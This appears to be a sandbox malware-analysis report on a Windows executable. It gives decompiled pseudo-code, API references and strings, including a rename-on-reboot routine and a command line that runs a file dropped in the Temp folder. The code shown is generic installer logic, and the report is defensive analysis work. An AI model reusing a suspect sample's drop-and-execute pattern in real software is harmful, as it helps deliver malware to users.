0x004049f8
0x004049f8
0x004049fb
0x00000000
0x00404a02
0x00404931
0x00404937
0x00404941
0x0040494c
0x0040494f
0x00404952
0x0040495d
0x00404960
0x00404967
0x00404974
0x00404985
0x0040498b
0x00404993
0x004049a1
0x004049a7
0x004049a7
0x00404967
0x004049b1
0x00000000
0x004049bc
0x004049c0
0x004049d0
0x004049d0
0x004049d6
0x004049e2
0x004049e2
0x00000000
0x004049e6
0x004049b1
0x004048cd
0x00000000
0x004048df
0x004048e4
0x004048ea
0x00000000
0x00000000
0x00404913
0x00404915
0x0040491a
0x00000000
0x0040491a
0x004048cd
0x0040479b
0x0040479e
0x004047a3
0x004047b4
0x004047b4
0x004047bc
0x004047bf
0x004047c3
0x004047c6
0x004047ca
0x004047cd
0x004047d0
0x004047d3
0x004047da
0x004047dc
0x004047dc
0x004047e6
0x004047f3
0x004047fd
0x00404802
0x00404805
0x0040480a
0x00404821
0x00404828
0x0040483b
0x0040483e
0x00404852
0x00404859
0x0040485e
0x00404863
0x00404863
0x00404871
0x0040487f
0x00404891
0x00404896
0x004048a6
0x004048a8
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
GetDlgItem.USER32 ref: 00404835
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
GetSysColor.USER32(?), ref: 00404863
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
lstrlenW.KERNEL32(?), ref: 00404884
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
GetDlgItem.USER32 ref: 004048FF
SendMessageW.USER32(00000000), ref: 00404906
GetDlgItem.USER32 ref: 00404931
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
LoadCursorW.USER32(00000000,00007F02), ref: 00404982
SetCursor.USER32(00000000), ref: 00404985
LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
SetCursor.USER32(00000000), ref: 004049A1
SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2

Strings

C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk, xrefs: 00404960
N, xrefs: 0040491F

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk$N
API String ID: 3103080414-876093690
Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x004062ae
0x004062b7
0x004062be
0x004062c8
0x004062dc
0x00406304
0x0040630b
0x0040630f
0x00406313
0x00406333
0x0040633a
0x00406344
0x00406351
0x00406356
0x0040635b
0x0040635f
0x0040636e
0x00406370
0x0040637d
0x00406381
0x0040641c
0x00000000
0x00406397
0x004063a4
0x004063c8
0x004063cc
0x004063eb
0x004063ef
0x004063ef
0x004063f1
0x004063fa
0x00406405
0x00406410
0x00406416
0x00000000
0x00406416
0x004063ce
0x004063d1
0x004063dc
0x004063d8
0x004063da
0x004063db
0x004063db
0x004063e3
0x004063e5
0x00000000
0x004063e5
0x004063af
0x004063b5
0x00000000
0x004063b5
0x00406381
0x0040635f
0x004062de
0x004062e9
0x004062f2
0x004062f6
0x00000000
0x00000000
0x004062f6
0x00406427

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
GetShortPathNameW.KERNEL32 ref: 004062F2

Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF

GetShortPathNameW.KERNEL32 ref: 0040630F
wsprintfA.USER32 ref: 0040632D
GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
GlobalFree.KERNEL32 ref: 00406416
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D

Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\xeWd55M5Lb.exe,80000000,00000003), ref: 0040615C
Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

Strings

uB, xrefs: 00406304
[Rename], xrefs: 00406397, 004063A9
mB, xrefs: 004062D7
%ls=%ls, xrefs: 00406323
uB, xrefs: 0040630B

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$mB$uB$uB
API String ID: 2171350718-2295842750
Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

0x004066a5
0x004066a5
0x004066a5
0x004066ab
0x004066b0
0x004066c1
0x004066c1
0x004066c9
0x004066ca
0x004066cb
0x004066cc
0x004066cf
0x004066d7
0x004066d9
0x004066ea
0x004066ed
0x004066ed
0x004066f1
0x004066f7
0x004066fa
0x004068d5
0x004068d5
0x004068e0
0x004068ec
0x004068ec
0x00000000
0x00406700
0x00406705
0x0040671a
0x0040671b
0x00406721
0x004068b3
0x004068c1
0x004068c4
0x004068c4
0x004068b5
0x004068b8
0x004068bb
0x004068bd
0x004068bd
0x004068c6
0x004068c6
0x004068cc
0x004068cf
0x00406702
0x00000000
0x00406702
0x00000000
0x004068cf
0x00406727
0x0040672a
0x00406739
0x00406740
0x0040674c
0x0040674f
0x00406752
0x00406753
0x00406758
0x0040675e
0x00406761
0x00406764
0x00406857
0x0040685c
0x0040688f
0x00406894
0x00406899
0x0040689e
0x0040689e
0x004068a3
0x004068a9
0x004068ac
0x00000000
0x004068ac
0x0040685e
0x00406861
0x00406864
0x00406879
0x00406880
0x00406866
0x0040686d
0x0040686d
0x00406888
0x0040688b
0x0040684f
0x00406850
0x00406850
0x00000000
0x0040688b
0x00406771
0x00406775
0x00406775
0x00406776
0x00406778
0x004067b5
0x004067b8
0x004067c8
0x004067cb
0x004067d3
0x004067d9
0x004067d9
0x00406834
0x00406834
0x00406836
0x00000000
0x00000000
0x004067dd
0x004067e2
0x004067e3
0x004067e5
0x004067fc
0x0040680a
0x00406810
0x00406812
0x00406830
0x00406830
0x00406830
0x00000000
0x00406830
0x00406818
0x00406821
0x00406824
0x0040682a
0x0040682e
0x00000000
0x00000000
0x00000000
0x0040682e
0x004067f6
0x004067f8
0x004067fa
0x00000000
0x00000000
0x00000000
0x004067fa
0x00000000
0x00406834
0x004067c0
0x00000000
0x0040677a
0x00406798
0x004067a1
0x0040683e
0x00406842
0x0040684a
0x0040684a
0x00000000
0x00406842
0x004067ab
0x00406838
0x0040683c
0x00000000
0x00000000
0x00000000
0x0040683c
0x00406778
0x00000000
0x00406705

APIs

GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,00000400), ref: 004067C0
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406844
C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk, xrefs: 004066CF, 00406782, 00406789, 0040678D, 004067AA, 004067BF, 004067D2, 004067E7, 00406814, 00406849, 0040684F, 0040686C, 0040687F, 0040689D, 004068A3, 004068AC, 004068E2
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040678E

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-2823772864
Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x004056d0
0x004056da
0x004056df
0x004056e5
0x004056f0
0x004056f3
0x004056f6
0x004056fc
0x004056fc
0x00405702
0x0040570a
0x0040570d
0x0040572a
0x0040572e
0x00405737
0x00405737
0x00405741
0x0040574a
0x00405756
0x0040575d
0x00405761
0x00405764
0x00405777
0x00405785
0x00405785
0x00405789
0x0040578b
0x0040578e
0x00000000
0x0040578e
0x0040570f
0x00405717
0x0040571f
0x00405725
0x00000000
0x00405725
0x0040571f
0x0040570d
0x0040579a

APIs

lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
SetWindowTextW.USER32(00422728,00422728), ref: 00405737
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Part of subcall function 004066A5: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
Part of subcall function 004066A5: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4

Strings

('B, xrefs: 004056EB

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
